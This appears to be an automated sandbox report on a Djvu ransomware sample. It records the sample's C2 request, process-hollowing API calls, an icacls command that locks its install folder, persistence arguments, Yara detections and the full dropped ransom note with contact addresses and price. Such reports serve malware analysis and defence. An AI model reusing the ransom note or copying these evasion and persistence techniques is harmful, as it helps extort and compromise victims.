Source: global traffic | HTTP traffic detected: GET /fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C HTTP/1.1 | User-Agent: Microsoft Internet Explorer | Host: securebiz.org
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 10_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,10_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands:

          Found ransom note / readme
          Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txt Dropped file: ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-1JwFK5rT39 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0336gSd743daN9cBvsGMXusve1sBoUrEE1q7fttlXX9WCZBkEkw
          Yara detected Djvu Ransomware
          Source: Yara match, File sources (type: UNPACKEDPE): 12.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpack, 13.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 10.1.NZPC0PFaC0.exe.400000.0.unpack, 1.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, 5.2.NZPC0PFaC0.exe.400000.0.unpack, 11.2.NZPC0PFaC0.exe.8c15a0.1.raw.unpack, 10.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 9.2.NZPC0PFaC0.exe.8415a0.1.unpack, 9.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, 10.2.NZPC0PFaC0.exe.400000.0.unpack, 14.2.NZPC0PFaC0.exe.8b15a0.1.raw.unpack, 13.1.NZPC0PFaC0.exe.400000.0.unpack, 12.2.NZPC0PFaC0.exe.400000.0.unpack, 12.1.NZPC0PFaC0.exe.400000.0.unpack, 8.2.NZPC0PFaC0.exe.7c15a0.1.unpack, 16.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 5.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 14.2.NZPC0PFaC0.exe.8b15a0.1.unpack, 16.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 12.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 1.2.NZPC0PFaC0.exe.8415a0.1.unpack, 16.2.NZPC0PFaC0.exe.400000.0.unpack, 16.1.NZPC0PFaC0.exe.400000.0.unpack, 5.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 10.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 13.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 13.2.NZPC0PFaC0.exe.400000.0.unpack, 11.2.NZPC0PFaC0.exe.8c15a0.1.unpack, 5.1.NZPC0PFaC0.exe.400000.0.unpack
          Source: Yara match, File sources (type: MEMORY): 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp
          Source: Yara match, Process Memory Space (type: MEMORYSTR): NZPC0PFaC0.exe PIDs 4332, 752, 5344, 1376, 7112, 4340, 5608, 6880, 1308, 7044
          Modifies existing user documents (likely ransomware behavior)
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe File moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe File deleted: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe File moved: C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpg
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe File deleted: C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.jpg
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe File moved: C:\Users\user\Desktop\QNCYCDFIJJ\PWCCAWLGRE.pdf
          Source: NZPC0PFaC0.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Matched rule: SUSP_XORed_URL_in_EXE (date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27) in the following sources:
          Sources (type: UNPACKEDPE): 12.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpack, 13.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 10.1.NZPC0PFaC0.exe.400000.0.unpack, 1.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, 5.2.NZPC0PFaC0.exe.400000.0.unpack, 11.2.NZPC0PFaC0.exe.8c15a0.1.raw.unpack, 10.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 9.2.NZPC0PFaC0.exe.8415a0.1.unpack, 9.2.NZPC0PFaC0.exe.8415a0.1.raw.unpack, 10.2.NZPC0PFaC0.exe.400000.0.unpack, 14.2.NZPC0PFaC0.exe.8b15a0.1.raw.unpack, 13.1.NZPC0PFaC0.exe.400000.0.unpack, 12.2.NZPC0PFaC0.exe.400000.0.unpack, 12.1.NZPC0PFaC0.exe.400000.0.unpack, 8.2.NZPC0PFaC0.exe.7c15a0.1.unpack, 16.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 5.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 14.2.NZPC0PFaC0.exe.8b15a0.1.unpack, 16.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 12.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 1.2.NZPC0PFaC0.exe.8415a0.1.unpack, 16.2.NZPC0PFaC0.exe.400000.0.unpack, 16.1.NZPC0PFaC0.exe.400000.0.unpack, 5.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 10.2.NZPC0PFaC0.exe.400000.0.raw.unpack, 13.1.NZPC0PFaC0.exe.400000.0.raw.unpack, 13.2.NZPC0PFaC0.exe.400000.0.unpack, 11.2.NZPC0PFaC0.exe.8c15a0.1.unpack, 5.1.NZPC0PFaC0.exe.400000.0.unpack
          Sources (type: MEMORY): 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, 0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmp, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp, 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, 0000000C.00000002.347226816.0000000000400000.00000040.00000001.sdmp, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, 00000010.00000002.553605048.0000000000400000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe Code functions: 1_2_0040A46B, 1_2_0040DC17, 1_2_0040E4C0, 1_2_0040E8CC, 1_2_0040E0EC, 1_2_0040ECEC, 1_2_004119B2, 1_2_00414E6E, 1_2_00407AEA, 1_2_00411EF6, 1_2_00412FF2, 1_2_0084B0B0, 1_2_008500D0, 1_2_008618D0, 1_2_008430EE, 1_2_0084B000, 1_2_0086E9A3, 1_2_0086F9B0, 1_2_0084CA10, 1_2_0084DBE0, 1_2_00850B00, 1_2_0084E6E0, 1_2_0084C760
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe Code functions: 5_2_0040D240, 5_2_00419F90, 5_2_0040C070, 5_2_0042E003, 5_2_0042F010, 5_2_00410160, 5_2_0044237E, 5_2_004344FF, 5_2_0043E5A3, 5_2_0044B5B1, 5_2_0040A660, 5_2_0041E690, 5_2_0040274E, 5_2_0040A710, 5_2_0040F730, 5_2_0044D7A1, 5_2_0042C804, 5_2_0044D9DC, 5_2_00449A71, 5_2_00443B40, 5_2_0044ACFF, 5_2_0040DD40, 5_2_0040BDC0, 5_2_0042CE51, 5_2_00420F30, 5_2_00449FE3
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe Code functions: 5_1_0040D240, 5_1_00419F90, 5_1_0040C070, 5_1_0042E003, 5_1_0042F010, 5_1_00410160, 5_1_0044237E, 5_1_004344FF
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe Code functions: 8_2_007CB000, 8_2_007C30EE, 8_2_007D00D0, 8_2_007E18D0, 8_2_007CB0B0, 8_2_007EF9B0, 8_2_007EE9A3, 8_2_007CCA10, 8_2_007D0B00, 8_2_007CE6E0, 8_2_007CC760
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe Code functions: 9_2_0084B0B0, 9_2_008500D0, 9_2_008618D0, 9_2_008430EE, 9_2_0084B000, 9_2_0086E9A3, 9_2_0086F9B0, 9_2_0084CA10, 9_2_0084DBE0, 9_2_00850B00, 9_2_0084E6E0, 9_2_0084C760
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe Code functions: 10_2_00427D6C, 10_2_00419F90, 10_2_0040C070, 10_2_0042E003, 10_2_00408030, 10_2_00410160, 10_2_004C8113, 10_2_004021C0, 10_2_0044237E, 10_2_004084C0, 10_2_004344FF, 10_2_0043E5A3, 10_2_0040A660, 10_2_0041E690, 10_2_00406740, 10_2_00402750, 10_2_0040A710, 10_2_00408780, 10_2_0042C804, 10_2_00406880, 10_2_004349F3, 10_2_004069F3, 10_2_00402B80, 10_2_00406B80, 10_2_0044ACFF, 10_2_0042CE51, 10_2_00434E0B, 10_2_00406EE0, 10_2_00420F30, 10_2_00405057, 10_2_0042F010, 10_2_004070E0, 10_2_004391F6, 10_2_0040D240, 10_2_00435240, 10_2_004C9343, 10_2_00405447, 10_2_00405457, 10_2_00449506, 10_2_0044B5B1, 10_2_00435675, 10_2_00409686
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Code function: String function: 00868EC0 appears 38 times
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Code function: String function: 00870160 appears 31 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00868EC0 appears 38 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00428C81 appears 65 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00420EC2 appears 39 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 007F0160 appears 31 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 004547A0 appears 80 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00422587 appears 42 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 007E8EC0 appears 35 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 0042F7C0 appears 102 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 004080B0 appears 42 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 0044F23E appears 92 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00428520 appears 121 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00450870 appears 52 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00454E50 appears 40 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00441A25 appears 51 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 0044F26C appears 35 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: String function: 00870160 appears 31 times
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 1_2_00840110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 8_2_007C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Code function: 9_2_00840110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess
          Source: NZPC0PFaC0.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (8 resources)
          Source: NZPC0PFaC0.exe.5.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (8 resources)
          Source: NZPC0PFaC0.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NZPC0PFaC0.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NZPC0PFaC0.exe | Virustotal: Detection: 35%
          Source: NZPC0PFaC0.exe | ReversingLabs: Detection: 55%
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | File read: C:\Users\user\Desktop\NZPC0PFaC0.exe
          Source: NZPC0PFaC0.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe'
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe'
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: unknown | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: unknown | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: unknown | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe'
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Process created: C:\Users\user\Desktop\NZPC0PFaC0.exe 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Process created: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\geo[1].json
          Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@18/166@6/2
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Code function: 5_2_00412440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: --Admin (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: IsAutoStart (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: IsTask (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: --ForNetRes (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: IsAutoStart (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: IsTask (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: --Task (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: --AutoStart (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: --Service (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: X1P (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: --Admin (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: runas (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: x2Q (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: x*P (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: C:\Windows\ (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: D:\Windows\ (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: 7P (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: %username% (10_2_00419F90)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Command line argument: F:\ (10_2_00419F90)
          Source: NZPC0PFaC0.exe | String found in binary or memory: set-addPolicy
          Source: NZPC0PFaC0.exe | String found in binary or memory: id-cmc-addExtensions
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 times)
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | File read: C:\Windows\System32\drivers\etc\hosts (7 times)
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: NZPC0PFaC0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: NZPC0PFaC0.exe, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
          Source: Binary string: C:\lif-ved49-podacarofo-judisovuhola10.pdb source: NZPC0PFaC0.exe
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
          Source: Binary string: cC:\lif-ved49-podacarofo-judisovuhola10.pdb source: NZPC0PFaC0.exe

          Data Obfuscation:

          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Unpacked PE file: 5.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Unpacked PE file: 10.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 12.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 13.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 16.2.NZPC0PFaC0.exe.400000.0.unpack
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Unpacked PE file: 5.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exe | Unpacked PE file: 10.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 12.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe | Unpacked PE file: 13.2.NZPC0PFaC0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
